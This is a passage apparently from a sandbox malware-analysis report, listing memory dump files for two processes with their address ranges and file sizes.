                                                                                                        • memory/2492-766-0x0000000074B20000-0x00000000752D0000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/2492-18-0x0000000007160000-0x000000000716A000-memory.dmp
                                                                                                          Filesize

                                                                                                          40KB

                                                                                                        • memory/2492-14-0x0000000074B20000-0x00000000752D0000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/2492-13-0x0000000074B20000-0x00000000752D0000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/2492-767-0x0000000074B20000-0x00000000752D0000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/3040-33-0x00007FF80D370000-0x00007FF80D565000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/3040-34-0x00007FF80BD60000-0x00007FF80BE1E000-memory.dmp
                                                                                                          Filesize

                                                                                                          760KB

                                                                                                        • memory/3040-32-0x0000016162320000-0x000001616234A000-memory.dmp
                                                                                                          Filesize

                                                                                                          168KB

                                                                                                        • memory/3040-31-0x0000016161F20000-0x0000016161F42000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB